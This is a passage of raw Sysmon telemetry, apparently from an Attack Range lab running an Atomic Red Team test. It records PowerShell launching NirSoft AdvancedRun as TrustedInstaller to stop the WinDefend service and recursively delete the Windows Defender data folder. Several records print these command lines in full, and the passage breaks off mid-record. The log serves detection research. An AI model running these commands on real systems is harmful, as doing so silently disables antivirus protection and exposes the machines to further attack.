WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.840{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.840{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.840{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.840{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003979782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003979781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-F418-61EA-6704-000000002702}43763796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003979780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F418-61EA-6704-000000002702}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003979779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.809{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.809{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003979777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.809{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003979776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.809{834264DD-F418-61EA-6704-000000002702}43763796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003979775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.815{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F418-61EA-6704-000000002702}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003979524Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.550{834264DD-F418-61EA-6704-000000002702}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003979166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:39.198{834264DD-F413-61EA-6404-000000002702}520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003979160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:39.090{834264DD-F411-61EA-6304-000000002702}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:57:39.090ATTACKRANGE\Administrator 154100x80000000000000003978049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:37.403{834264DD-F411-61EA-6204-000000002702}5200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 23542300x80000000000000003974622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:55:56.236{834264DD-F3A7-61EA-4E04-000000002702}5124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8truetrue 154100x80000000000000003971301Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:55:28.499{834264DD-F390-61EA-4904-000000002702}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003971295Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:55:28.394{834264DD-F38F-61EA-4804-000000002702}2732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:55:28.394ATTACKRANGE\Administrator 154100x80000000000000003970409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:55:26.957{834264DD-F38E-61EA-4704-000000002702}520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003967509Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003967507Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967506Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 